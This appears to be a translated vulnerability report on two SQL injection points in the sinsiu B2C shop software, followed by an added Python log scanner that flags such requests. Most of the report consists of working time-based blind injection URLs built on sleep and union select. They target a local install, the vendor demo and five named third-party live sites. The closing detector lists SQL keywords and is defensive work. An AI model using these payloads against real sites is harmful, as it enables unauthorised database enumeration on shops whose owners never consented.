First, the result:
http://localhost:8080/sinsiu_b2c_1_0_3/upload/?/goods/cat-1*if(ascii(substr((select+user()from(b2c_varia)where(var_id=1)),1,1))=114,sleep(5),1)/
This way the whole site can be enumerated.
Now the demo site:
http://b2c.demo.sinsiu.com/?/goods/cat-1*if(ascii(substr((select+user()from(b2c_varia)where(var_id=1)),1,1))=114,sleep(5),1)/
Both cause a delay.
Code:
goods_main.php:
Second injection point
Proof examples for the first injection point
1.http://tnkjw.com/?/goods/cat-1*if(1,sleep(5),1)/
2.http://www.ledpf.com/?/goods/cat-1*if(1,sleep(5),1)/
3.http://tnkjw.com/?/goods/cat-1*if(1,sleep(5),1)/
4.http://645.net.cn/?/goods/cat-1*if(1,sleep(1),1)/
5.http://www.nbcxaf.com/?/goods/cat-1*if(1,sleep(1),1)/
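Proof examples for the second injection point. I don't know why, but what these sites reflect back, unlike in the actual demo test, is not sensitive information.
From another angle, though, this still proves that the SQL injection exists: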
1.http://tnkjw.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
2.http://www.ledpf.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
3.http://tnkjw.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
4.http://645.net.cn/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
5.http://www.nbcxaf.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
All of them cause a five-second delay.
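A defensive sketch for the two injection points above, as an added example that is not part of the original report or the sinsiu code base: it parses the `?/module/name-value/` route style seen in the URLs and flags access-log requests whose `cat` value is not a plain integer or whose `key` value carries SQL syntax. The log lines, the validation rules and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (addresses are documentation placeholders).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2015:10:00:00 +0800] "GET /?/goods/cat-1/ HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2015:10:00:05 +0800] "GET /?/goods/cat-1*if(1,sleep(5),1)/ HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2015:10:01:00 +0800] "GET /?/search/index.html/cat-0/key-led%20lamp/ HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Jan/2015:10:01:09 +0800] "GET /?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%23/ HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed rule set: quote/comment characters and a few SQL keywords.
SQL_TOKENS = re.compile(r"['\"#;]|--|\b(?:union|select|sleep|benchmark)\b", re.I)

def route_params(target):
    """Yield (name, decoded value) for each 'name-value' route segment."""
    _, _, route = target.partition("?")
    for seg in route.split("/"):
        name, sep, value = seg.partition("-")
        if sep:
            yield name, unquote(value)

def suspicious(target):
    """Return the reasons a request target looks like an injection attempt."""
    reasons = []
    for name, value in route_params(target):
        if name == "cat" and not re.fullmatch(r"[0-9]+", value):
            reasons.append("cat is not a plain integer: %r" % value)
        elif name == "key" and SQL_TOKENS.search(value):
            reasons.append("key contains SQL syntax: %r" % value)
    return reasons

def scan(lines):
    """Return the request targets in the log that trip a rule."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and suspicious(m.group(1)):
            hits.append(m.group(1))
    return hits

if __name__ == "__main__":
    for target in scan(SAMPLE_LOG):
        print(target, suspicious(target))
```

The same integer check on `cat`, applied server-side before the value reaches the query, together with a bound parameter for `key`, is the corresponding fix rather than only a detection.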